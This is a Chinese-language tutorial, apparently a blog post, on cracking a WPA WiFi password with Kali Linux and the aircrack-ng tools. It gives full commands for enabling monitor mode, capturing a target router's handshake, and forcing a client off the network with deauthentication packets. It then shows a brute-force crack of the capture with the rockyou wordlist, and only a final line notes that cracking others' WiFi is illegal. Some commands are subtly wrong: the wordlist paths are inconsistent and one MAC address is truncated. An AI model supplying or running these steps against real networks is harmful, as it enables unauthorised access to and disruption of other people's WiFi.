kali linux本身就有字典檔案,我們把它解壓出來。
root@kali:~# gzip -d /usr/share/wrodlists/rockyou.txt.gz
這裡我們選用暴力破解。
1.輸入airmon-ng檢視是否支援監聽模式
從圖中可以看到我的無線網絡卡wlan0是支援監聽模式的。如果該命令沒有任何輸出則表示沒有可以支援監聽模式的網絡卡。(airmon-ng也是需要安裝的,裝機的時候應該有。有些可能顯示的是wifi0,但不管怎樣實質都是一樣的,只是輸入的時候注意下。)
2.開啟無線網絡卡的監聽模式
如果前面顯示的是wifi0,就把wlan0改為wifi0
root@kali:~# airmon-ng start wlan0
大家這時候再輸入ifconfig,會發現wlan0變為了wlan0mon,這表明網絡卡監聽模式已開啟。
3.搜尋一下附近的WiFi。
root@kali:~# airodump-ng wlan0mon
使用airodump-ng 命令列出無線網絡卡掃描到的WiFi熱點詳細資訊,包括訊號強度,加密型別,通道等。這裡我們記下要破解WiFi的BSSID和通道,如圖中我用紅色標記出來的。當搜尋到我們想要破解的WiFi熱點時可以 Ctrl+C 停止搜尋。
4.抓取握手包 使用網絡卡的監聽模式抓取周圍的無線網路資料包,其中我們需要用到的資料包是包含了WiFi密碼的握手包,當有新使用者連線WiFi時會發送握手包。
抓包。
root@kali:~# airodump-ng -c 10 --bssid D4:EE:07:12:57:80 -w ~/ wlan0mon
引數解釋:
-c 指定通道,上面已經標記目標熱點的通道-bssid指定目標路由器的BSSID,就是上面標記的BSSID-w指定抓取的資料包儲存的目錄上面可以看到連線到wifi熱點的裝置,我標記出來的是我的平板電腦的MAC地址。
5.強制連線到wifi的裝置重連路由器 現在我們使用aireplay-ng命令給平板傳送一個反認證包,使平板電腦強制斷開連線,隨後它會自動再次連線wifi。 不難看出,airplay-ng生效的前提是WiFi熱點中必須至少已經接入一個裝置。 由於剛剛開啟的終端一直在執行抓包工作,所以我們重新開啟一個終端,輸入命令。
# aireplay-ng -0 2 -a D4:EE:07:12:57:80 -c AC:CF:85:B6:81 wlan0mon
引數解釋
-a指定WiFi熱點的BSSID-c指定要攻擊裝置的MAC地址此刻可以看到已經成功抓取到握手包了。如下:
這個時候使用Ctrl+C命令停止抓包,同時結束無線網絡卡的監聽模式。 結束監聽:
root@kali:~# airmon-ng stop wlan0mon
6 暴力破解 上面已經成功抓取到了握手包,現在要做的工作就是將握手包的密碼和字典檔案中的密碼進行匹配,我只是使用了一般複雜的全字母密碼,花了將近20分鐘破解出密碼。
root@kali:~# aircrack-ng -a2 -b D4:EE:07:12:57:80 -w /usr/share/wordlist/rockyou.txt ~/*.cap
可以看到,密碼出來了。
PS:私自破解他人wifi密碼是違法的。